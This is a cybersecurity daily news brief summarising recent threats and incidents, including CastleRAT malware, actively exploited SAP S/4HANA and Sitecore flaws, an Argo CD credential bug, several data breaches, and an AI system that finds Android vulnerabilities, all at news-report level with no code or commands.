Daily Brief

TAG-150, a criminal group, has developed CastleRAT malware in both Python and C, using social engineering to trick users into executing malicious commands. The C variant of CastleRAT is adept at harvesting keystrokes, capturing screens, and maintaining persistence, while the Python version focuses on evasion. CastleRAT spreads through ClickFix techniques, which involve fake login prompts convincing users to execute malware under the guise of system fixes. TAG-150's operations are sophisticated, leveraging encrypted communications via Tox Chat and hosting infrastructure across Russia and the Netherlands. The group operates a malware-as-a-service model, with a significant focus on American targets, complicating attribution efforts. Recorded Future advises monitoring network activity on ports 443, 7777, and 80, and warns against trusting established cloud providers blindly. TAG-150's history of developing multiple malware families suggests they may introduce new threats soon, necessitating vigilant cybersecurity defenses.

Microsoft has enforced multifactor authentication (MFA) for Azure Portal sign-ins for all tenants since March 2025, enhancing security measures across its cloud services. The initiative, first announced in May 2024, aims to protect users against cyber threats by requiring MFA for Azure administration access. Following the Azure Portal rollout, MFA enforcement will extend to Azure CLI, PowerShell, SDKs, and APIs by October 2025, further safeguarding user accounts. Microsoft previously advised Entra global admins to activate MFA by October 2024 to prevent loss of access to admin portals. A Microsoft study revealed that MFA reduces account compromise risk by 98.56%, demonstrating its effectiveness in thwarting unauthorized access. GitHub, owned by Microsoft, began enforcing two-factor authentication for developers in January 2024, aligning with Microsoft's broader MFA adoption strategy. These efforts reflect Microsoft's commitment to achieving 100% MFA adoption, significantly reducing the risk of account takeovers.

A critical code-injection flaw in SAP S/4HANA, rated 9.9, is currently under active exploitation, posing severe risks to affected systems. The vulnerability, tracked as CVE-2025-42957, impacts both private cloud and on-premises versions, allowing attackers to take over SAP systems. SecurityBridge Threat Research Labs discovered the flaw and confirmed its exploitation, demonstrating potential for creating unauthorized superuser accounts and manipulating business data. The flaw's low complexity enables attackers to inject arbitrary ABAP code, bypassing authorization checks and compromising system integrity and data security. SAP released a patch in August; organizations are urged to apply these updates immediately to mitigate potential exploitation risks. Customers are advised to implement SAP UCON to restrict RFC usage and monitor for suspicious activity, such as unauthorized admin-level user creation and ABAP code modifications. The vulnerability's exploitation could lead to full system compromise, data theft, and operational disruptions, necessitating immediate defensive measures.

CISA has mandated that Federal Civilian Executive Branch agencies update their Sitecore instances by September 25, 2025, due to a critical vulnerability under active exploitation. The vulnerability, CVE-2025-53690, has a CVSS score of 9.0, allowing attackers to execute remote code via exposed ASP.NET machine keys. Mandiant identified the attack, which uses a sample machine key from outdated Sitecore deployment guides, facilitating unauthorized server access and privilege escalation. The flaw's exploitation involves deploying the WEEPSTEEL payload to gather and exfiltrate system, network, and user information. Attackers establish persistence by creating local admin accounts and leveraging tools for reconnaissance and lateral movement, leading to potential data theft. Organizations are advised to rotate ASP.NET machine keys, secure configurations, and scan for compromise indicators to mitigate the threat. Sitecore has updated new deployments to generate unique keys automatically, contacting affected customers; the full impact of the vulnerability remains uncertain.

Wealthsimple, a major Canadian financial services firm, reported a data breach affecting personal data of under 1% of its clients, with no financial losses or password compromises. The breach was traced to a compromised third-party software package, impacting contact details, government IDs, financial information, and other personal data. Wealthsimple has offered affected clients two years of complimentary credit monitoring, dark-web monitoring, identity theft protection, and insurance to mitigate potential risks. The breach is believed to be part of a larger Salesloft supply-chain attack by the ShinyHunters group, which has targeted Salesforce customers using voice phishing and OAuth token theft. ShinyHunters has previously breached high-profile companies, including Google and Cisco, by compromising Salesforce instances and accessing sensitive information. Wealthsimple has advised clients to enhance account security with two-factor authentication and remain vigilant against phishing scams. This incident underscores the importance of securing third-party software and supply chains to protect sensitive customer data.

A critical vulnerability in Argo CD, CVE-2025-55190, allows API tokens with low permissions to access repository credentials, posing significant risks to organizations using this tool. The flaw holds a maximum severity score of 10.0 in CVSS v3, enabling attackers to bypass isolation mechanisms and potentially clone codebases or inject malicious content. Affected organizations include major enterprises like Adobe, Google, and IBM, which rely on Argo CD for large-scale deployments, heightening the potential impact of this vulnerability. Exploitation requires a valid Argo CD API token but does not require high-level permissions, increasing the risk of unauthorized access to sensitive data. The vulnerability affects all versions of Argo CD up to 2.13.0, with fixes available in versions 3.1.2, 3.0.14, 2.14.16, and 2.13.9, urging immediate updates. The exposure could lead to serious threats, including code theft, extortion, and supply chain attacks, making prompt remediation essential for affected enterprises. Administrators are advised to update to the patched versions immediately to mitigate the risk and protect sensitive credentials from potential exploitation.

Organizations face increasing identity-based attacks, necessitating efficient Identity Governance & Administration (IGA) to secure data and maintain compliance in complex IT environments. Traditional IGA solutions, while customizable, often require extensive setup with custom code, leading to delays and increased costs for businesses. Legacy IGA systems can take years to implement, creating technical debt and failing to deliver timely security enhancements. No-code IGA solutions like tenfold offer out-of-the-box integration, reducing setup time from months or years to mere weeks. These modern solutions provide pre-developed plugins and a visual interface, simplifying deployment and minimizing IT workload. The shift to no-code IGA supports faster security posture improvements and compliance, without sacrificing flexibility for custom requirements. Businesses are encouraged to evaluate IGA solutions based on integration timelines, essential features, and organizational needs for optimal security and operational efficiency.

TAG-150, a threat actor, has developed CastleRAT, a remote access trojan, in both Python and C, enhancing their malware-as-a-service framework, CastleLoader, since March 2025. CastleRAT's core functions include system information collection, payload execution, remote shell capabilities, and self-deletion, with the C variant offering additional features like keystroke logging and cryptocurrency clipping. Infections are primarily initiated through Cloudflare-themed phishing attacks and fraudulent GitHub repositories, leveraging domains mimicking software libraries and online platforms. The multi-tiered infrastructure used by TAG-150 includes victim-facing command-and-control servers and backup servers, with CastleRAT employing Steam Community profiles for C2 server resolution. Recent developments in CastleRAT's C variant show active evolution, with changes in data collection practices and feature enhancements, indicating ongoing refinement by TAG-150. eSentire tracks CastleRAT as NightshadeC2, noting its use of UAC Prompt Bombing to bypass security measures, and its deployment via a .NET loader. The emergence of CastleRAT and related malware highlights the persistent threat of advanced malware frameworks and the importance of robust phishing defenses and security monitoring.

A critical vulnerability, CVE-2025-42957, in SAP S/4HANA is actively exploited, allowing attackers to inject arbitrary code and take over systems. The flaw resides in an RFC-exposed function module, posing significant risks such as data theft and operational disruption. Despite a patch released on August 11, 2025, many systems remain unpatched, making them susceptible to attacks. SecurityBridge discovered and reported the vulnerability, aiding SAP in developing a patch, but exploitation persists due to unpatched systems. The vulnerability allows low-privileged users to bypass authorizations, escalating their privileges through backdoor account creation. SecurityBridge warns of potential impacts, including credential theft and malware deployment, urging immediate patch application. SAP administrators are advised to apply the August 2025 Patch Day updates to mitigate risks associated with this vulnerability.

SAP S/4HANA's critical command injection vulnerability, CVE-2025-42957, is actively exploited, posing severe risks to enterprise systems. The flaw allows arbitrary ABAP code execution, threatening system integrity. The vulnerability, with a CVSS score of 9.9, was addressed in SAP's recent monthly updates, but exploitation continues, impacting both on-premise and Private Cloud editions. Attackers can exploit this flaw using low-privileged user access, potentially leading to full system compromise, fraud, data theft, espionage, or ransomware deployment. SecurityBridge Threat Research Labs has observed active exploitation, though widespread attacks are not yet reported. Reverse engineering the patch to create exploits is relatively straightforward. Organizations are urged to apply patches immediately, monitor for suspicious RFC calls, and review admin user activities to mitigate potential threats. Additional security measures include implementing SAP UCON to restrict RFC usage and reviewing access to critical authorization objects to enhance protection. This incident highlights the importance of timely patch management and proactive monitoring to safeguard critical enterprise systems against emerging vulnerabilities.

Affinity Learning Partnership, managing seven UK schools, reported a data breach affecting over 650 staff members following a cyberattack on software developer Intradev. The breach potentially exposed sensitive personal information, including names, addresses, and identification numbers, through compromised services provided by OnlineSCR. Intradev, based in Hull, identified the breach on August 4 and is conducting a thorough investigation to assess the impact on its systems and data. Affected staff have been advised on precautionary measures, with some considering document replacements, although the ICO suggests this may not be necessary. The incident underscores the vulnerability of educational institutions to cyber threats, particularly through third-party service providers handling critical data. Affinity Learning Partnership is offering affected staff CIFAS protective registration for two years, enhancing identity verification to mitigate potential fraud risks. This breach highlights the importance of robust cybersecurity practices and third-party risk management for organizations handling sensitive data.

Traditional pentest reporting methods, such as static PDFs and spreadsheets, are creating inefficiencies and delays in remediation processes. Automated platforms like PlexTrac enable real-time delivery of pentest findings, integrating seamlessly into existing client workflows. Automation in pentest delivery enhances visibility across the vulnerability lifecycle, reducing mean time to remediation significantly. Continuous Threat Exposure Management (CTEM) and increased testing frequency demand efficient handling of growing volumes of findings. Service providers gain a competitive edge by adopting automated delivery, offering clients faster, more actionable insights. Enterprises benefit from operational maturity and reduced risk by transitioning to automated, standardized pentest workflows. The shift towards automated delivery supports proactive security measures, helping teams collaborate more effectively and stay ahead of threats.

Cybersecurity researchers identified a phishing campaign using SVG files to deploy Base64-encoded phishing pages targeting the Colombian judicial system, undetected by antivirus engines due to advanced evasion techniques. VirusTotal reported 44 unique SVG files in this campaign, with a total of 523 detected in the wild, indicating a sophisticated and evolving threat landscape. Attackers use these SVG files to simulate official document downloads while secretly triggering ZIP file downloads, although the contents of these files remain undisclosed. Concurrently, a separate campaign targets macOS users with Atomic macOS Stealer (AMOS), exploiting cracked software downloads to deploy an information stealer via terminal commands. AMOS is capable of extensive data theft, including credentials, browser data, and cryptocurrency wallets, posing significant risks to enterprise environments increasingly adopting macOS. Apple's Gatekeeper protections block traditional .dmg-based infections, but attackers have shifted to terminal-based methods, circumventing built-in security measures. The rise of terminal-based attacks on macOS underscores the need for comprehensive defense strategies beyond default operating system protections. These developments reflect a broader trend of attackers adapting to security advancements, emphasizing the importance of proactive threat intelligence and layered security approaches.

Attackers are exploiting a configuration flaw in Sitecore products, specifically targeting a ViewState deserialization vulnerability, CVE-2025-53690, to achieve remote code execution. The vulnerability affects Sitecore Experience Manager, Experience Platform, Experience Commerce, and Managed Cloud, particularly when using static machine keys from older documentation. Successful exploitation can lead to unauthorized access and deployment of WEEPSTEEL malware, which collects system, network, and user information from compromised machines. Mandiant disrupted an attack exploiting this flaw, preventing full lifecycle observation but noting attackers' deep understanding of the vulnerability and product. The US Cybersecurity and Infrastructure Security Agency has added CVE-2025-53690 to its Known Exploited Vulnerabilities catalog, urging immediate key rotation and patching. Sitecore's updated deployments now generate random machine keys, mitigating the risk; organizations using older versions should update and secure their configurations promptly. This incident underscores the importance of regularly updating security configurations and avoiding the use of default or sample keys in production environments.

Researchers from Nanjing University and The University of Sydney developed A2, an AI system that identifies and validates vulnerabilities in Android applications, discovering 104 zero-day flaws in 169 apps. A2 achieved 78.3% coverage on the Ghera benchmark, outperforming traditional static analysis tools like APKHunt, which only reached 30% coverage. The AI system's validation capability reduces false positives, offering a more efficient approach to vulnerability detection, crucial for security teams burdened by low-signal warnings. A2 employs a three-step validation process to confirm vulnerabilities, such as an intent redirect flaw in a widely installed Android app, demonstrating its ability to find impactful issues. The system's cost-effectiveness is notable, with detection costs ranging from $0.003 to $3.35 per APK, and full validation costs between $0.59 and $26.85 per vulnerability. A2's success signals a shift in cybersecurity, with AI-driven tools potentially transforming how vulnerabilities are discovered and addressed, prompting increased activity in both defense and exploitation. While promising for bug bounty hunters, A2's capabilities also highlight the need for rapid defensive measures to prevent exploitation of uncovered vulnerabilities.